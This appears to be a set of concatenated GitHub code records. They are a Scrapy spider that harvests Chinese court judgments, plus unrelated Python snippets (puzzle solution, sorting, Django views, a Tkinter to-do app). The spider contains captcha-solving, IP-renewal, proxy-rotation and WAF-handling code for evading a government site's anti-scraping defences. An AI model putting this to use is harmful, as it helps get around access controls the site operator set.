doc_count\n\t\t\t\n\t\t\tlogger.debug('Scraped task id = {}, total count: {}'.format(task.get('task_id', 0), doc_count))\n\n\t\t\tdocs = []\n\t\t\tif len(data) > 
1:\n\t\t\t\tfor item in data[1:]:\n\t\t\t\t\tdoc = DocItem()\n\t\t\t\t\tdoc_id = item.get('文书ID', '')\n\t\t\t\t\t# doc_id = jshelper.decryptDocID(runEval, doc_id)\n\t\t\t\t\tdoc['doc_id'] = doc_id\n\t\t\t\t\tdoc['status'] = 0\n\t\t\t\t\tdoc['case_name'] = item.get('案件名称', '')\n\t\t\t\t\tdoc['case_no'] = item.get('案号', '')\n\t\t\t\t\tdoc['case_type'] = item.get('案件类型', '')\n\t\t\t\t\tdoc['court_name'] = item.get('法院名称', '')\n\t\t\t\t\tdoc['trial_date'] = item.get('裁判日期', '')\n\t\t\t\t\tdoc['trial_summary'] = item.get('裁判要旨段原文', '')\n\t\t\t\t\tdocs.append(doc)\n\n\t\t\t\tdoc_ids = jshelper.decryptDocIDs(runEval, list(map(lambda doc: doc['doc_id'], docs)))\n\t\t\t\tif not (len(doc_ids) == len(docs)):\n\t\t\t\t\traise Exception('Error: doc_ids length not equals to docs length')\n\t\t\t\tfor i in range(0, len(docs)):\n\t\t\t\t\tdocs[i]['doc_id'] = doc_ids[i]\n\t\t\t\t\t\n\t\t\tif len(docs) > 1:\n\t\t\t\tself.doc_pipeline.save_docs(docs)\n\t\t\t\n\t\t\ttask['fails'] = 0\n\n\t\t\tself.crawler.stats.inc_value('docid_scraped_count', count = len(docs) - 1, spider=self)\n\t\t\t\t\t\n\t\texcept Exception as e:\n\n\t\t\ttask['fails'] = task.get('fails', 0) + 1\n\t\t\tlogger.error('Parse list response error\\n%(error)s\\nrepsone code:%(status)d\\nrequest task:\\n%(task)s\\nrequest param:\\n%(param)s\\nresponse text:\\n%(text)s', {'error': e, 'status': response.status, 'task': task, 'text': response.text, 'param': response.request.meta.get('param')}, exc_info = True, extra = {'response': response})\n\n\t\tfinally:\n\n\t\t\tfails = task.get('fails', 0) > 0\n\t\t\tif fails:\n\t\t\t\ttask['status'] = 0\n\t\t\telif task.get('status', 0) == -1:\n\t\t\t\ttask['status'] = 1\n\n\t\t\tself.task_pipeline.update(task)\n\t\t\tyield self.ListContentRequest(response)\n\n\tdef parse_list(self, response):\n\t\tsession = response.request.meta.get('session', None)\n\t\tcookies = session.get('cookies', None)\n\n\t\tset_cookies = response.headers.getlist('Set-Cookie')\n\t\tif set_cookies and len(set_cookies) > 0:\n\t\t\tfor cookie in set_cookies:\n\t\t\t\tname_value = cookie.decode().split(';')[0].split('=')\n\t\t\t\tif name_value[0] == 'vjkl5':\n\t\t\t\t\tvjkl5 = name_value[1]\n\t\t\t\t\tvl5x = jshelper.getKey(vjkl5)\n\t\t\t\t\tsession['vjkl5'] = vjkl5\n\t\t\t\t\tsession['vl5x'] = vl5x\n\t\t\t\t\tsession['vl5x_time'] = time.time()\n\n\t\tvl5x = session.get('vl5x', None)\n\t\tif vl5x:\n\t\t\tyield self.NumberRequest()\n\t\telse:\n\t\t\tyield self.ListRequest()\n\n\tdef parse_number(self, response):\n\t\tif len(response.text) >= 4 and len(response.text) < 40:\n\t\t\tself.last_number_time = time.time()\n\t\t\tnumber = response.text\n\t\t\tsession = response.request.meta.get('session', None)\n\t\t\tsession['number'] = number\n\t\t\tsession['number_time'] = time.time()\n\t\t\tlogger.debug('Success get code: {}'.format(response.text))\n\t\t\tyield self.ListContentRequest(response)\n\t\telse:\n\t\t\tlogger.debug('Failed get code, retrying...')\n\t\t\tyield self.NumberRequest()\n\n\tdef other_error(self, failure):\n\t\ttask = failure.request.meta.get('task', None)\n\t\tif task:\n\t\t\tif task.get('status', 0) == -1:\n\t\t\t\ttask['status'] = 0\n\t\t\tself.task_pipeline.update(task)\n\n\t\tif not (failure.check(Vl5xTimeoutError) or task):\n\t\t\tlogger.error('%s:%s', repr(failure), failure.request.url)\n\n\t\t#middleware will not handle errback output, so call middleware method here, ref:\n\t\t# FIXME: don't ignore errors in spider middleware, in scraper.py\n\t\trequest = self.ListRequest()\n\t\trequest = 
self.session_ware.process_output_request(request, failure, self)\n\t\trequest.meta['delay_request'] = 0.5\n\n\t\tif failure.check(TimeoutError, ResponseNeverReceived, ConnectionRefusedError, WafVerifyError):\n\t\t\tlogger.error('%s:%s', repr(failure), failure.request.url)\n\t\t\t# request.meta['delay_request'] = self.WAF_DELAY\n\n\t\tyield request\n\t\n\n\tdef _init_stats_task(self):\n\t\tself.prev_docid_scraped_count = 0\n\t\tself.multiplier = 60.0 / self.STATS_INTERVAL\n\t\tself.stats_task = task.LoopingCall(self._log)\n\t\tself.stats_task.start(self.STATS_INTERVAL)\n\n\tdef _log(self):\n\t\tdocid_scraped_count = self.crawler.stats.get_value('docid_scraped_count', 0)\n\t\tdocrate = (docid_scraped_count - self.prev_docid_scraped_count) * self.multiplier\n\t\tself.prev_docid_scraped_count = docid_scraped_count\n\t\tmsg = 'Last task date: %(year)s-%(month)s-%(day)s, Crawled %(docs)d docs (at %(docrate)d docs/min)'\n\t\tlog_args = {'year': self.last_task.get('year', 0), 'month': self.last_task.get('month', 0), 'day': self.last_task.get('day', 0), 'docs': docid_scraped_count, 'docrate': docrate}\n\t\tlogger.info(msg, log_args)\n\n\t@classmethod\n\tdef from_crawler(cls, crawler, *args, **kwargs):\n\t\tspider = super(ListSpider, cls).from_crawler(crawler, *args, **kwargs)\n\t\tcrawler.signals.connect(spider.spider_closed, signal=signals.spider_closed)\n\t\treturn spider\n\n\tdef spider_closed(self, spider):\n\t\tjshelper.free()\n\n\tdef create_guid(self):\n\t\tc = lambda: format(int((1 + random.random()) * 65536), 'x')[1:]\n\t\treturn c() + c() + '-' + c() + '-' + c() + c() + '-' + c() + c() + c()\n\n\t#Param: 法院层级:基层法院,案件类型:民事案件,审判程序:一审,文书类型:判决书,裁判日期:2018-12-11 TO 2018-12-11,法院地域:北京市\n\tdef _task_to_post_param(self, task):\n\t\tself.TASK_PARAM_KEY_MAP = {\n\t\t\t'trial_date': '裁判日期',\n\t\t\t'court_area': '法院地域',\n\t\t\t'middle_court': '中级法院',\n\t\t\t'basic_court': '基层法院',\n\t\t\t'doc_type': '文书类型',\n\t\t}\n\t\t\n\t\tday = task.get('day', None)\n\t\tmonth = task.get('month', None)\n\t\tyear = task.get('year', None)\n\t\tstart_day = day\n\t\tend_day = day\n\t\tstart_month = month\n\t\tend_month = month\n\n\t\tif day is None:\n\t\t\tstart_day = 1\n\t\t\tif month is None:\n\t\t\t\tstart_month = 1\n\t\t\t\tend_month = 12\n\t\t\t\tend_day = 31\n\t\t\telse:\n\t\t\t\tend_day = calendar.monthrange(year, end_month)[1]\n\n\t\td = {}\n\n\t\tfor key in self.TASK_PARAM_KEY_MAP.keys():\n\t\t\tvalue = task.get(key, None)\n\t\t\tif key == 'trial_date':\n\t\t\t\td[self.TASK_PARAM_KEY_MAP[key]] = '{}-{}-{} TO {}-{}-{}'.format(year, '{:02d}'.format(start_month), '{:02d}'.format(start_day), year, '{:02d}'.format(end_month), '{:02d}'.format(end_day))\n\t\t\telif key == 'court_area' and value == '最高人民法院':\n\t\t\t\td['法院层级'] = '最高法院'\n\t\t\telif value is None:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif len(value) > 0:\n\t\t\t\t\td[self.TASK_PARAM_KEY_MAP[key]] = value\n\n\t\tcourt_level = task.get('court_level', None)\n\t\tif not (court_level is None):\n\t\t\td['法院层级'] = court_level\n\n\t\tparam = []\n\t\tfor key in d.keys():\n\t\t\tparam.append('{}:{}'.format(key, d[key]))\n\n\t\treturn ','.join(param)\n\n\t# def CaptChaRequest(self):\n\t# \treturn scrapy.Request(url = self.CAPTCHA_URL + str(random.randint(1, 9999)), headers = {'Referer': 'http://wenshu.court.gov.cn'}, callback = self.parse_captcha, errback = self.other_error, meta = {'dont_delay': True})\n\n\t# def CaptChaValidateRequest(self, captcha_code):\n\t# \treturn scrapy.FormRequest(url = self.CAPTCHA_VALIDATE_URL, formdata = {'ValidateCode': captcha_code}, 
headers = {'Referer': 'http://wenshu.court.gov.cn'}, callback = self.parse_captcha_validate, errback = self.other_error, meta = {'dont_delay': True})\n\n\t# def CaptChaSovleRequest(self, prepped):\n\t# \treturn scrapy.Request(url = self.CAPTCHA_SOLVE_URL, method = 'POST', headers = prepped.headers, body = prepped.body, callback = self.parse_captcha_solve, errback = self.other_error, meta = {'dont_delay': True})\n\n\n\t# def parse_captcha(self, response):\n\t# \tif isinstance(response, Response) and response.status == 200:\n\t# \t\tfiles = {'captcha_image': response.body}\n\t# \t\tprepped = requests.Request('POST', self.CAPTCHA_SOLVE_URL, files=files).prepare()\n\t# \t\tyield self.CaptChaSovleRequest(prepped)\n\t# \telse:\n\t# \t\tlogger.info('Failed to get captcha, retrying...')\n\t# \t\tyield self.CaptChaRequest()\n\n\t# def parse_captcha_solve(self, response):\n\t# \tif len(response.text) > 0:\n\t# \t\tyield self.CaptChaValidateRequest(response.text)\n\t# \telse:\n\t# \t\tlogger.error('Not recognize the captcha')\n\t# \t\tyield self.CaptChaRequest()\n\n\t# def parse_captcha_validate(self, response):\n\t# \tif response.text == '1':\n\t# \t\tlogger.info('Success solve captcha!')\n\t# \t\tsession = response.request.meta.get('session', None)\n\t# \t\tyield self.ListRequest()\n\t# \telse:\n\t# \t\tlogger.info('Retry solve captcha...')\n\t# \t\tyield self.CaptChaRequest()\n\n\t# def F80ForListRequest(self):\n\t# \treturn scrapy.Request(url = self.F80COOKIES_URL, callback = self.parse_f80_for_list, errback = self.other_error, meta = {'dont_delay': True})\n\n\t# def F80ForListContentRequest(self):\n\t# \treturn scrapy.Request(url = self.F80COOKIES_URL, callback = self.parse_f80_for_list_content, errback = self.other_error, meta = {'dont_delay': True})\n\n\n\t# def parse_f80_for_list(self, response):\n\t# \tsession = response.request.meta.get('session', None)\n\t# \tf80cookies = json.loads(response.text)\n\t# \tsession['f80s'] = f80cookies['f80s']\n\t# \tsession['f80t'] = f80cookies['f80t']\n\t# \tyield self.ListRequest(response)\n\n\t# def parse_f80_for_list_content(self, response):\n\t# \tsession = response.request.meta.get('session', None)\n\t# \tf80cookies = json.loads(response.text)\n\t# \tsession['f80s'] = f80cookies['f80s']\n\t# \tsession['f80t'] = f80cookies['f80t']\n\t# \tyield self.ListContentRequest(response)\n\n\n\t# def HomeRequest(self):\n\t# \treturn scrapy.Request(url = self.HOME_URL, callback = self.parse_home, errback = self.other_error, dont_filter = True, meta = {'dont_delay': True})\n\n\t# def parse_home(self, response):\n\t# \tsession = response.request.meta.get('session', None)\n\t# \tmeta = response.css('#9DhefwqGPrzGxEp9hPaoag::attr(content)').extract_first()\n\t# \tsession['meta'] = meta\n\n\t# \tywtu = jshelper.getYWTU(meta)\n\t# \tsession['ywtu'] = ywtu\n\n\t# \tset_cookies = response.headers.getlist('Set-Cookie')\n\t# \tif set_cookies and len(set_cookies) > 0:\n\t# \t\tfor cookie in set_cookies:\n\t# \t\t\tname_value = cookie.decode().split(';')[0].split('=')\n\t# \t\t\tif name_value[0] in ['FSSBBIl1UgzbN7N80S', 'FSSBBIl1UgzbN7N80T']:\n\t# \t\t\t\tsession[name_value[0]] = name_value[1]\n\n\t# \t\tyield self.ListRequest(response)\n\n\t# def parse_server_list(self, response):\n\t# \tif isinstance(response, Response) and response.status == 200:\n\t# \t\tprint(response.text)\n\t# \t\tresult = json.loads(response.text)\n\t# \t\tif result and result.get('status', False):\n\t# \t\t\tservers = result.get('data', {})\n\t# \t\t\tself.wenshu_servers = [s.get('ip') for s in 
servers]\n\t# \t\t\tlogger.debug('Success to get server list: {}'.format(self.wenshu_servers))\n\t# \t\t\treturn self.ListRequests(response)\n\t# \telse:\n\t# \t\tlogger.error('%s:%s', repr(response), response.request.url)\n\n\t# \traise scrapy.exceptions.CloseSpider('Error: can not get wenshu server ips')\n\n\n\t# def change_ip_address(self):\n\t# \tlogger.info('Now will renew pppoe ip addr, please wait...')\n\n\t# \twhile True:\n\t# \t\tlast_ip_addr = ni.ifaddresses('ppp0')[AF_INET][0]['addr']\n\t# \t\tos.system('osascript ' + self.settings.get('PROJECT_ROOT') + '/scripts/renewip.scpt')\n\t# \t\ttime.sleep(0.5)\n\t# \t\tnew_ip_addr = ni.ifaddresses('ppp0')[AF_INET][0]['addr']\n\t# \t\tif new_ip_addr != last_ip_addr:\n\t# \t\t\tbreak\n\t# \tlogger.info('Successed change ip!')\n\n\n\t# def load_available_proxies(self):\n\t# \tproxies = self.proxy_pipline.available_proxies()\n\t# \tfor proxy in proxies:\n\t# \t\tif (not proxy['ip'] in self.available_proxies.keys()) and (not proxy['ip'] in self.used_proxies.keys()):\n\t# \t\t\tself.available_proxies[proxy['ip']] = proxy\n\n\t# def next_available_proxy(self):\n\t# \tfor ip in self.available_proxies.keys():\n\t# \t\tif not ip in self.used_proxies.keys():\n\t# \t\t\tproxy = self.available_proxies.pop(ip)\n\t# \t\t\tself.used_proxies[proxy['ip']] = proxy\n\t# \t\t\treturn proxy","repo_name":"sparkwj/wenshu","sub_path":"wenshu/spiders/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":16790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74943893265","text":"from copy import deepcopy\nfrom typing import List\n\n\ndef add_padding(img: List[List[str]], size: int, val: str):\n for _ in range(size):\n img.insert(0, [val] * len(img[0]))\n img.append([val] * len(img[0]))\n for i in range(len(img)):\n img[i].insert(0, val)\n img[i].append(val)\n\n\ndef solve(enh: str, img: List[List[str]], steps: int):\n add_padding(img, 2, '.')\n for _ in range(steps):\n border = img[0][0]\n add_padding(img, 1, border)\n new_img = deepcopy(img)\n for i in range(len(new_img[0])):\n if border == '.':\n new_img[0][i] = enh[0]\n new_img[-1][i] = enh[0]\n else:\n new_img[0][i] = enh[-1]\n new_img[-1][i] = enh[-1]\n\n for i in range(len(new_img)):\n if border == '.':\n new_img[i][0] = enh[0]\n new_img[i][-1] = enh[0]\n else:\n new_img[i][0] = enh[-1]\n new_img[i][-1] = enh[-1]\n\n for i in range(1, len(new_img) - 1):\n for j in range(1, len(new_img[0]) - 1):\n square = img[i - 1][j - 1:j + 2] + img[i][j - 1:j + 2] + img[i + 1][j - 1:j + 2]\n bin_str = ''\n for e in square:\n bin_str += '0' if e == '.' 
else '1'\n idx = int(bin_str, 2)\n new_img[i][j] = enh[idx]\n img = new_img\n\n count = 0\n for row in img:\n count += row.count('#')\n print(count)\n\n\nif __name__ == '__main__':\n with open('test.txt', 'r') as file:\n input_lines = file.readlines()\n input_lines = [line.replace('\\r\\n', '').replace('\\n', '') for line in input_lines]\n\n enhancer = input_lines[0]\n\n image = []\n for ii in range(2, len(input_lines)):\n image.append(list(input_lines[ii]))\n\n solve(enhancer, image, 50)\n","repo_name":"gumbernator/Advent-of-Code-2021","sub_path":"day20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13616302427","text":"\"\"\"The manifold_utils module provides interfaces for manifold learning and dimensionality reduction.\n \n\"\"\"\n__author__ = (\"Bernhard Lehner \")\n\n\nfrom sklearn.manifold import TSNE\n\n\ndef tsne_embedding(X, n_dim=2, perplexity=3):\n tsne = TSNE(n_components=n_dim,\n init='random',\n perplexity=perplexity,\n learning_rate='auto')\n X_embedded = tsne.fit_transform(X)\n \n return X_embedded","repo_name":"berni-lehner/structural_health_monitoring","sub_path":"src/manifold_utils.py","file_name":"manifold_utils.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14102457909","text":"__author__ = \"Frank Shen\"\n\n\n# 递归实现\ndef quick_sort(seq):\n if len(seq) < 2:\n return seq\n else:\n pivot = seq[0]\n left = [elem for elem in seq[1:] if elem <= pivot]\n right = [elem for elem in seq[1:] if elem > pivot]\n return quick_sort(left) + [pivot] + quick_sort(right)\n\n\ndef test_quick_sort():\n import random\n ll = list(range(10))\n for i in range(10):\n random.shuffle(ll)\n assert quick_sort(ll) == list(range(10))\n\n\ntest_quick_sort()\n\n\n# def test_quick_sort():\n# import random\n# seq = list(range(10))\n# random.shuffle(seq)\n# print(quick_sort(seq))\n#\n#\n# test_quick_sort()\n#\n# def partition(array, beg, end):\n# pivot_index = beg\n# pivot = array[pivot_index]\n# left = pivot_index + 1\n# right = end - 1\n# while True:\n# while left <= right and array[left] < pivot:\n# left += 1\n#\n# while right >= left and array[right] >= pivot:\n# right -= 1\n# if left > right:\n# break\n# else:\n# array[left], array[right] = array[right], array[left]\n# array[pivot_index], array[right] = array[right], array[pivot_index]\n# return right\n#\n#\n# def quick_sort_inplace(array, beg, end):\n# if beg < end:\n# pivot = par\n","repo_name":"Frankssss/DataStructure-Algorithm","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10727955124","text":"from django.http import JsonResponse\nfrom django.views.generic import DetailView,TemplateView\nfrom plan.views import PlanDetailView,PlanView\nfrom django.views.generic.list import ListView\nfrom django.views.generic import DetailView\nfrom django.db.models import Q,Max\n\nfrom homepage.utils import get_context_obj\nfrom .models import FixedInternet\nfrom .forms import FixedInternetForm\nfrom .utils import donut_calculation\n\n\nclass FixedInternetHome(TemplateView):\n template_name = 'fixed_internet/fixed_internet_home.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form_class'] = 
FixedInternetForm()\n con = get_context_obj(self.request)\n context['obj'] = con['obj']\n context['country'] = con['country']\n return context\n\n\nclass FixedInternetList(PlanView):\n model = FixedInternet\n context_object_name = 'plans'\n template_name = 'fixed_internet/fixed_internet_listing.html'\n page_template = 'fixed_internet/fixed_internet_listing_template.html'\n\n def __init__(self):\n self.form_class = None\n\n super(FixedInternetList, self).__init__()\n\n def get_queryset(self):\n sort = self.request.GET.get(\"order_by\")\n\n data_range = self.request.GET.get('data')\n price_range = self.request.GET.get('price_range')\n selected_network = self.request.GET.get('selected_network')\n try:\n country = self.request.session.get('country')\n except:\n country = \"SA\"\n #\n qs = FixedInternet.active_fixed_internet.all()\n qs = qs.filter(country__country_code=country)\n\n\n if data_range:\n qs = qs.filter(Q(upload_speed__gte=int(data_range)))\n # #\n if price_range:\n qs = qs.filter(Q(monthly_fee__gte=int(price_range)))\n # #\n # if selected_network:\n #\n # qs = qs.filter(operator_id__operator=selected_network)\n # #\n # if sort:\n # qs = qs.order_by(sort)\n\n self.form_class = FixedInternetForm(self.request.GET, qs=qs,session = self.request.session)\n return qs\n\n\n def get(self, request, *args, **kwagrs):\n\n return super(FixedInternetList, self).get(request, *args, **kwagrs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n con = get_context_obj(self.request)\n context['obj'] = con['obj']\n context['country'] = con['country']\n context['form_class'] = self.form_class\n return donut_calculation(context)\n\n\nclass FixedInternetDetail(DetailView):\n template_name = 'fixed_internet/fixed_internet_detail.html'\n model = FixedInternet\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n con = get_context_obj(self.request)\n context['obj'] = con['obj']\n context['country'] = con['country']\n return context\n\n\ndef fixed_count(request):\n \"\"\"\n :param request: only_sim=on&phone_name=samsung1&phone_media=&phone_slug=&data=0&minutes=21&messages=0&\n selected_network=\n :return: count of plan\n \"\"\"\n\n data = request.GET.get('data', None)\n\n selected_network = request.GET.get('selected_network', None)\n try:\n country = request.session.get('country')\n except:\n country = \"SA\"\n\n qs = FixedInternet.active_fixed_internet.all()\n qs = qs.filter(country__country_code=country)\n\n if selected_network:\n qs = qs.filter(operator_id__operator=selected_network)\n\n if data:\n qs = qs.filter(Q(download_speed__gte=int(data)))\n\n return JsonResponse(qs.count(), status=200, safe=False)","repo_name":"Aravindhan-M/first_project","sub_path":"fixed_internet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13755101045","text":"import sys\nimport heapq\nfrom collections import deque\n\n\ndef solve():\n input = sys.stdin.readline\n\n N, K = map(int, input().split())\n\n jewel = [list(map(int, input().split())) for _ in range(N)]\n bag = [int(input()) for _ in range(K)]\n\n # 1. 보석 무게 순 정렬\n jewel = deque(sorted(jewel))\n # 2. 가방 무게 순 정렬\n bag.sort()\n # 3. 
이미 들어갈 수 있는 무게라고 확인한 값들 중에 최대인 값 힙으로 저장\n    max_heap = []\n\n    ans = 0\n    for i in range(K):\n        while jewel:\n            jewel_weight, jewel_value = jewel[0]\n            if (bag[i] >= jewel_weight):\n                heapq.heappush(max_heap, -jewel_value)  # 최대 순으로 힙에 저장\n                jewel.popleft()\n            else:\n                break\n        if max_heap:\n            ans += -(heapq.heappop(max_heap))  # 넣을 수 있는 값 중 최대 값 넣어줌\n    print(ans)\n\n\nsolve()\n","repo_name":"Daejjyu/Algorithm","sub_path":"Jungle/Week4_Dp, Greedy/00_exam_3_1202_보석 도둑.py","file_name":"00_exam_3_1202_보석 도둑.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"38296148441","text":"from tkinter import *\nfrom tkinter import ttk\nimport time\nfrom tkinter import filedialog\nfrom typing import Literal, Optional\nimport json\n\n# from Tkinter import Widget\n# Widget._nametowidget(parent)\n\nfile = open('E:\\\\1.Python_f\\\\Glossory\\\\Tools_main_file\\\\tdlist\\\\info.json', 'a')\nroot = Tk()\nroot.geometry(\"500x500\")\n#Collapsible pane\nclass Cp(ttk.Frame):\n    \"\"\"\n    -----USAGE-----\n    collapsiblePane = CollapsiblePane(parent,\n                          expanded_text =[string],\n                          collapsed_text =[string])\n\n    collapsiblePane.pack()\n    button = Button(collapsiblePane.frame).pack()\n    \"\"\"\n\n    def __init__(self, parent, expanded_text =\"Collapse <<\",\n                               collapsed_text =\"Expand >>\", expanding = False, name='cp'):\n\n        ttk.Frame.__init__(self, parent, name=name)\n\n        # These are the class variables\n        # see an underscore in expanded_text and _collapsed_text\n        # this means these are private to class\n        self.parent = parent\n        self.expanded_text = expanded_text\n        self.collapsed_text = collapsed_text\n\n        # Here weight implies that it can grow its\n        # size if extra space is available\n        # default weight is 0\n        self.columnconfigure(1, weight = 1)\n\n        # Tkinter variable storing integer value\n        self.variable = IntVar()\n\n        # Checkbutton is created but will behave as Button\n        # cause in style, Button is passed\n        # main reason to do this is Button does not support\n        # variable option but Checkbutton does\n        self.button = ttk.Checkbutton(self, variable = self.variable,\n                            command = self.activate, style =\"TButton\")\n        self.button.grid(row = 0, column = 0)\n\n        # This will create a separator\n        # A separator is a line, we can also set thickness\n        self.separator = ttk.Separator(self, orient =\"horizontal\")\n        self.separator.grid(row = 0, column = 1, sticky =\"we\")\n\n        self.frame = ttk.Frame(self, name='special')\n\n        # This will call activate function of class\n        self.activate()\n\n\n        if expanding:\n            self.toggle()\n\n    def activate(self):\n        if not self.variable.get():\n\n            # As soon as button is pressed it removes this widget\n            # but is not destroyed means can be displayed again\n            self.frame.grid_forget()\n\n            # This will change the text of the checkbutton\n            self.button.configure(text = self.collapsed_text)\n\n        elif self.variable.get():\n            # increasing the frame area so new widgets\n            # could reside in this container\n            self.frame.grid(row = 1, column = 0, columnspan = 2)\n            self.button.configure(text = self.expanded_text)\n\n    def toggle(self, _state = 'default'):\n        \"\"\"Switches the label frame to the opposite state.\"\"\"\n        self.variable.set(not self.variable.get())\n        if _state != 'default':\n            self.variable.set(_state)\n        self.activate()\n\ndic = {}\n\nclass autoE(Entry):\n    \"\"\"please don't make fontcolor the same as placecolor\"\"\"\n    def __init__(self, parent, placeholder=None, placecolor='gray', fontcolor='black', only: Literal['None', 'Num', 'Text'] = 'None', limit: Optional[int] = None, space=True, 
quote=True, **arg):\n Entry.__init__(self, parent, fg=placecolor, **arg)\n self.bind(\"<FocusIn>\", self.click)\n self.bind(\"<FocusOut>\", self.out)\n self.bind(\"<KeyRelease>\", self.check)\n self.ph = placeholder\n self.fontc = fontcolor\n self.only = only\n self.limit = limit\n \n self.num = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\n self.text = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n self.quote = \"\"\"[ ! @ # $ % ^ & * ( ) , . / < > ? ; ' \\ : ` ~ - = _ +\"\"\"\n if space:\n self.num.append(' ')\n self.text.append(' ')\n if quote:\n self.num.extend(self.quote.split(' '))\n self.text.extend(self.quote.split(' ')) \n self.placecolor = placecolor\n self.insert(END, self.ph)\n\n def click(self, e):\n if self.get() == self.ph and self['fg'] == self.placecolor:\n self.delete(0, END)\n self['fg'] = self.fontc\n def out(self, e):\n if not self.get():\n self['fg'] = self.placecolor\n self.insert(END, self.ph)\n def check(self, e):\n s = ''\n if self.only == 'Num':\n \n for w in self.get():\n if w in self.num:\n s += w\n try:\n s = s[:self.limit]\n except TypeError:\n pass\n self.delete(0, END)\n self.insert(END, s)\n elif self.only == 'Text':\n for w in self.get():\n if w in self.text:\n s += w\n try:\n s = s[:self.limit]\n except TypeError:\n pass\n self.delete(0, END)\n self.insert(END, s)\n return\n\n##### ENDED ON trying to change the task from doing to finished. Since the master cannot be changed, working on\n##### collecting all the info of each widget in the task and moving it to the opposite pane. The get function will\n##### try to get the parents, the widget info and everything. Trying to work on that. Haven't finished yet.\n\ndef get(e):\n n = e.widget.winfo_parent()\n \n # n = n[0:-1]\n # n = '.'.join(n)\n print(n)\n get = [x for x in e.widget.config()]\n dic[e.widget] = {}\n for x in get:\n d = e.widget.cget(x)\n dic[e.widget][x] = d\n \n # s = \"\"\n n = root.nametowidget(n)\n n.destroy()\n # \n # n['parent'] = Fini_cf\n return\ncount = 0\n\ndef add_task(e):\n global count\n task = mainE.get()\n if task:\n tf = Frame(Undo_cf, name=task.lower()+'-frame'+str(count))\n tf.pack(anchor='w')\n # var = StringVar()\n # for x in range(0, 10):\n check = ttk.Checkbutton(tf, text=task, variable=StringVar(), name=task.lower()+'-check'+str(count))\n check.state(['!alternate'])\n check.pack(padx=20)\n count += 1\n check.bind('<Button-1>', get)\n \n \n on_configure(None)\n return\n\ndef on_configure(event):\n # update scrollregion after starting 'mainloop'\n # when all widgets are in canvas\n canvas.configure(scrollregion=canvas.bbox('all'))\n Undo_c.configure(scrollregion=Undo_c.bbox('all'))\n Fini_c.configure(scrollregion=Fini_c.bbox('all'))\n return\n\ndef _on_mousewheel(event):\n print(event, event.delta)\n print(event.widget)\n sx, sy = scrollbar.get()\n if 'undo_cf' in str(event.widget):\n Undo_c.yview_scroll(-1*int((event.delta/120)), \"units\")\n if 1.0 in Undo_s.get() and event.delta == -120 or 0.0 in Undo_s.get() and event.delta == 120:\n canvas.yview_scroll(-1*int((event.delta/120)), \"units\")\n return\n elif 'fini_cf' in str(event.widget):\n Fini_c.yview_scroll(-1*int((event.delta/120)), \"units\")\n if 1.0 in Fini_s.get() and event.delta == -120 or 0.0 in Fini_s.get() and event.delta == 120:\n Fini_c.yview_scroll(-1*int((event.delta/120)), \"units\")\n return\n if sx == 0.0 and sy == 1.0:\n return\n canvas.yview_scroll(-1*int((event.delta/120)), \"units\")\n return\n\ndef FrameWidth(event):\n canvas_width = 
event.width\n canvas.itemconfig(canva_frame, width = canvas_width)\n Undo_c['width'] = canvas_width -50\n Undo_c.itemconfig(Undo_cff, width=canvas_width-50)\n Undo_c['height'] = root.winfo_height()-200\n Fini_c['width'] = canvas_width -50\n Fini_c.itemconfig(Fini_cff, width=canvas_width-50)\n Fini_c['height'] = root.winfo_height()-200\n return\n\nFone = Frame(root, name='fone')\nFone.pack(anchor='center')\n\ncanvas = Canvas(root, name='main_canvas')\ncanvas.pack(side=LEFT, fill=BOTH, expand=True)\n\nscrollbar = Scrollbar(root, command=canvas.yview, name='main_scrollbar')\nscrollbar.pack(side=RIGHT, fill=Y)\n\n# scrollbar.bind('<Configure>', on_configure)\n# canvas.bind('<Configure>', on_configure)\n\ncanvas.configure(yscrollcommand = scrollbar.set)\n\ncanvas.bind('<Configure>', on_configure)\n\nTaskF = Frame(canvas, name='taskf')\n# TaskF.pack(expand=True, fill=BOTH)\ncanva_frame = canvas.create_window((0,0), window=TaskF, anchor='nw')\ncanvas.bind('<Configure>', FrameWidth)\ncanvas.bind_all(\"<MouseWheel>\", _on_mousewheel)\n# TaskF = Frame(root)\n# TaskF.pack(anchor='w', padx=50, pady=50)\n\nmainE = Entry(Fone, width=50, name='maine')\nmainE.grid(row=0, column=0)\nmainE.bind(\"<FocusIn>\", lambda x: maincp.toggle(_state=1))\nmainE.bind(\"<Return>\", add_task)\n\naddB = Button(Fone, text='+', font='times, 20', name='addb')\naddB.grid(row=0, column=1, padx=10)\n# addB.bind(\"<Button-1>\", add_task)\n\nmaincp = Cp(Fone, expanded_text='Description____________', collapsed_text='Description------------------', expanding=False, name='maincp')\nmainT = Text(maincp.frame, height=5, width=50, name='maint')\nmainT.grid(row=10, column=0, sticky='w')\nmaincp.grid(row=3, columnspan=2, sticky='w')\n\ndue = Frame(maincp.frame)\ndue.grid(row=1, columnspan=2)\n\nminute_e = autoE(due, 'min', only='Num', limit=2, space=False, quote=False, width=4)\nminute_e.grid(row=0, column=2)\n\nlab = Label(due, text=':')\nlab.grid(row=0, column=1)\n\nhour_e = autoE(due, 'hour', only='Num', 